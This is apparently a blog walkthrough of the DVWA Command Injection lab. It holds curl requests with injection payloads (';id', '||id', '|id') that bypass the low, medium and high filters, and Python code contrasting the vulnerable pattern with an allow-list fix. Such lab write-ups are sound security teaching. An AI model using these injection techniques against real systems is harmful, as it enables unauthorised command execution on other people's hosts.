So you installed Damn Vulnerable Web Application, now what do you do? Join me as I continue my series on learning about Linux CTF challenges with DVWA. DVWA (Damn Vulnerable Web Application) is a framework we can use to learn about the Linux exploits that come up in common CTF challenges. In this post I will go through beating the DVWA Command Injection challenge via the web GUI, curl and even Python.
What is Command Injection?
Command injection is an attack in which an attacker executes arbitrary commands on the host operating system; in the case of DVWA that is a remote operating system. Typically the attacker injects the commands by exploiting an application vulnerability such as insufficient input validation.
What is Command Injection good for?
If we can append our own commands to the end of another valid command, we can exploit that to access information we were never meant to have. In some cases, such as the low and medium security levels, it would not be too difficult to get a reverse shell just by appending the necessary commands via command injection. With the security level set to “high” it is more difficult and requires some “creative” thinking.
Set-up
System
In my previous post I discussed how to set up DVWA inside Docker on my BlackArch system. You should have a running DVWA environment before attempting any of the below.
Value | Description
192.168.1.163 | Docker host running DVWA
8082 | Port on which DVWA is running
192.168.1.150 | Windows PC where I am running WSL and Firefox
Authentication
Most of the requests we make here require authentication before any commands can be attempted. We can use a PHP session ID to authenticate.
Getting PHP Session ID
To get a session ID we will use Firefox, but Chrome and Edge have the same features. The first step is to open the DVWA home page and log in. The default login is user: admin and password: password.
Once logged in you need to set the DVWA Security to low. This can be done after login by clicking on the DVWA Security tab, setting the Security Level to low and clicking “Submit”.
Inside Firefox, let's open the Inspect tool. You can do this by right-clicking the page and selecting “Inspect”, or with the keyboard shortcut, which in Windows is “Ctrl + Shift + C”. Once it is open, go to the Storage tab and under “Cookies” select the PHPSESSID cookie. The cookie value will appear on the right side of the screen; right-click and copy it.
In my case the value is PHPSESSID: “hjqhvo1e4i14bo6hbh9ndqc7h2”. Whatever your value is, keep it somewhere safe as you will need it when doing some enumeration later on.
We can also see another cookie here called “security” with the value “low”. We need this for authentication and for setting the security level of the DVWA system.
Testing Authentication
Now that you have the PHP session ID it's simple to check whether it works.
First, without any authentication cookies:
curl http://192.168.1.163:8082/vulnerabilities/brute/
No result and nothing returned. Let's now try it with our PHP session cookie and security level:
curl http://192.168.1.163:8082/vulnerabilities/brute/ \
-H "Cookie: security=low;PHPSESSID=hjqhvo1e4i14bo6hbh9ndqc7h2" \
-s | head
We pipe the output into head because a lot of HTML is returned and we only want to see the top few lines.
We have now confirmed that our authentication works and can proceed with testing the exploits.
DVWA Command Injection
Security Levels
Like the rest of the DVWA challenges, the Command Injection one comes with 4 security levels.
- Low, a very straightforward injection attack.
- Medium, very similar to the previous one, with a slightly different approach.
- High, similar to the preceding two, not too challenging.
- Impossible, what it says.
Beating DVWA Command Injection on Low Security
GUI
Browse to your deployment of DVWA and log in with username and password (the default username is “admin” and password is “password”).
Go to the Command Injection page, put 8.8.8.8 in the box labelled “Enter an IP” and click Submit.
You can see that the ping command is run, and if you click the “View Source” button at the bottom of the page you can see what code is actually executed.
In this case the code is simple: there is no input validation, and the command that is run is
ping -c 4 $target
As there is no input validation, we can take advantage of a Linux command line feature that lets us chain commands together by simply putting a “;” between commands. For example:
whoami;id
This will run the “whoami” command and then run the “id” command.
There are a few other ways to do this:
- &&, which runs the following command only if the previous command succeeded: “id && whoami”
- ||, which runs the following command only if the previous command failed: “madeupcommand || whoami”
- |, which feeds the output of the command before the pipe into the command after it; the second command runs regardless of whether the first succeeded.
So for the easy option we can just add “;id” to the end of the input to beat it.
You can see in the screenshot below that the “id” command output appears below the ping output.
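To make the Low-level mistake concrete, here is the same pattern reproduced in Python beside a hardened version. This is an added example, not code from the post or from DVWA; the function names (build_vulnerable_command, shell_commands, validate_target, build_safe_command, run_ping) are mine. The vulnerable function glues the user's input onto a shell command string exactly as the post describes; shell_commands uses the standard shlex module to show how many separate commands the shell would actually run for a given input; the hardened path accepts only an IP literal (an allow-list, so there is no list of bad characters to get wrong) and passes an argv list to subprocess without a shell, so separators like “;” and “|” could never be interpreted even if the check were skipped.

```python
from __future__ import annotations

import ipaddress
import shlex
import subprocess


def build_vulnerable_command(target: str) -> str:
    """Mirror of the Low-level pattern: the user's input is glued straight
    onto a shell command string, so any shell metacharacters are honoured."""
    return "ping -c 4 " + target


def shell_commands(command_line: str) -> list[str]:
    """Split a command line the way a POSIX shell would, into the simple
    commands delimited by the control operators ; && || | and &.
    Used to make visible how many commands the shell would really run."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    commands: list[str] = []
    current: list[str] = []
    for token in lexer:
        if token in (";", "&&", "||", "|", "&"):
            if current:
                commands.append(" ".join(current))
            current = []
        else:
            current.append(token)
    if current:
        commands.append(" ".join(current))
    return commands


def validate_target(target: str) -> str:
    """Allow-list check: accept only a syntactically valid IPv4/IPv6 literal.
    Hostnames, whitespace and shell metacharacters are all rejected, so
    there is no denylist of characters to get subtly wrong."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError as exc:
        raise ValueError(f"invalid target: {target!r}") from exc


def build_safe_command(target: str) -> list[str]:
    """argv list for subprocess: with no shell involved, a ';' or '|' would
    reach ping as part of a single argument instead of acting as a separator."""
    return ["ping", "-c", "4", validate_target(target)]


def run_ping(target: str, dry_run: bool = True) -> str:
    """Hardened version. dry_run=True returns the exact command line that
    would run (quoted for display) so the demo works with no network."""
    argv = build_safe_command(target)
    if dry_run:
        return shlex.join(argv)
    completed = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return completed.stdout


if __name__ == "__main__":
    # Constructed sample inputs: a normal address and the chained forms from the post.
    for user_input in ("8.8.8.8", "8.8.8.8;id", "madeupcommand || whoami"):
        vulnerable = build_vulnerable_command(user_input)
        print(f"input {user_input!r}")
        print(f"  vulnerable string : {vulnerable!r}")
        print(f"  shell would run   : {shell_commands(vulnerable)}")
        try:
            print(f"  hardened          : {run_ping(user_input)}")
        except ValueError as err:
            print(f"  hardened          : rejected ({err})")
```

Run it and the input “8.8.8.8;id” is shown to become two shell commands in the vulnerable version, while the hardened version rejects it outright; set dry_run=False on run_ping to actually ping a validated address.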
curl
To do this with curl we need to make a POST request and use the cookie session data from above. An explanation of the curl options can be found with the “man curl” command.
curl -X POST "http://192.168.1.163:8082/vulnerabilities/exec/" \
-d 'ip=1.1.1.1;id&Submit=Submit' \
-H "Cookie: security=low;PHPSESSID=sini0kbuab7gorpopvaqnb8ke4" -s
I piped the result into grep (not shown in the command above) to limit the output to just the id command I ran.
Beating DVWA Command Injection on Medium Security
GUI
If you take a look at the PHP code you can see there is some substitution going on, but as only “&&” and “;” are substituted it is not too difficult to circumvent using a logical OR, “||”.
With a logical OR the second command only runs if the first command fails. As ping is the first command, we need it to fail before the next command will run, so we leave out the IP address.
curl
The curl command is mostly the same as the previous one. The “;” is substituted at this level, so the payload is just the “||” and the command we want to run.
curl -X POST "http://192.168.1.163:8082/vulnerabilities/exec/" \
-d 'ip=||id&Submit=Submit' \
-H "Cookie: security=medium;PHPSESSID=sini0kbuab7gorpopvaqnb8ke4" \
-s
Beating DVWA Command Injection on High Security
High security looks like a hard one to crack at first glance, as there is a PHP trim and a lot of substitutions, but rather than a security bug there seems to be a human error in the code.
If you look closely at the “|” substitution you can see there is a space after it. This means it will only substitute “| ” (pipe followed by a space) and not “|”. Once this is spotted it becomes easy to break.
We can just pipe into another command, with no space, to get what we need.
And we get a result.
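The Medium and High sections above both come down to the same design flaw: a denylist of characters that is stripped out of the input, where the real problem is that the input is ever handed to a shell. The following added example (my code, not the post's or DVWA's) emulates that filtering in Python so the two gaps the post points out can be checked directly. The Medium table is exactly what the post states (“&&” and “;” are removed). For High the post names only the flawed “| ” entry and the trim(); the other High entries here are a constructed stand-in for the post's “a lot of substitutions” and are assumptions, not a copy of DVWA's list. The function names (apply_blacklist, surviving_operators, check_level) are mine.

```python
from __future__ import annotations

# Medium, as the post describes it: only "&&" and ";" are removed.
MEDIUM_SUBSTITUTIONS: dict[str, str] = {"&&": "", ";": ""}

# High: the post names the flawed "| " entry (pipe followed by a space) and
# a trim(). The remaining entries are a constructed stand-in for the post's
# "a lot of substitutions" and are assumptions, not DVWA's actual list.
HIGH_SUBSTITUTIONS: dict[str, str] = {
    "&": "",
    ";": "",
    "| ": "",   # the bug: only a pipe *followed by a space* is removed
    "-": "",
    "$": "",
    "(": "",
    ")": "",
    "`": "",
    "||": "",
}

# Shell control operators whose survival means the filter failed its job.
SHELL_OPERATORS = ("&&", "||", ";", "|", "&", "`", "$(")


def apply_blacklist(target: str, substitutions: dict[str, str], trim: bool = False) -> str:
    """Emulate PHP str_replace() called with an array of search strings:
    each entry is applied in turn to the whole string, in order.
    trim=True models the PHP trim() the post mentions for High."""
    if trim:
        target = target.strip()
    for needle, replacement in substitutions.items():
        target = target.replace(needle, replacement)
    return target


def surviving_operators(filtered: str) -> list[str]:
    """Return the shell operators still present after filtering."""
    return [op for op in SHELL_OPERATORS if op in filtered]


def check_level(level: str, target: str) -> tuple[str, list[str]]:
    """Run an input through the filter model for 'medium' or 'high' and
    report (filtered_string, operators_that_survived). An empty list means
    the denylist neutralised this particular input; a non-empty list means
    the shell would still see a control operator."""
    if level == "medium":
        filtered = apply_blacklist(target, MEDIUM_SUBSTITUTIONS)
    elif level == "high":
        filtered = apply_blacklist(target, HIGH_SUBSTITUTIONS, trim=True)
    else:
        raise ValueError(f"no filter model for level {level!r}")
    return filtered, surviving_operators(filtered)


if __name__ == "__main__":
    # Constructed sample inputs: the forms discussed in the post.
    cases = [
        ("medium", "8.8.8.8;id"),   # ';' is stripped, so this one is caught
        ("medium", "||id"),         # '||' is not on the Medium list
        ("high", "| id"),           # pipe + space: caught by the "| " entry
        ("high", "|id"),            # pipe with no space: slips straight through
        ("high", "  8.8.8.8  "),    # trim() only tidies whitespace
    ]
    for level, payload in cases:
        filtered, survivors = check_level(level, payload)
        verdict = "FILTER FAILED" if survivors else "neutralised"
        print(f"{level:6} {payload!r:14} -> {filtered!r:12} {verdict} {survivors}")
```

The model reproduces both observations from the post: at Medium “||” survives because it is simply not on the list, and at High “|id” survives while “| id” is caught, because the entry contains a trailing space. The general lesson is that a denylist has to be exhaustive and exact to be safe, whereas an allow-list (accept only a valid IP literal and never invoke a shell) has no such edge cases.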
curl
Very similar to the medium one, but note the cookie now selects the high level, and the payload is only the pipe with no space followed by the command.
curl -X POST "http://192.168.1.163:8082/vulnerabilities/exec/" \
-d 'ip=|id&Submit=Submit' \
-H "Cookie: security=high;PHPSESSID=sini0kbuab7gorpopvaqnb8ke4" \
-s
Doing it with Python
I have written a Python script that can do all security levels. You can find it over at my GitHub page.
Wrap-Up
I hope you learned something from this and I value any comments you have. Also check out my video on how to do all of this in the web GUI.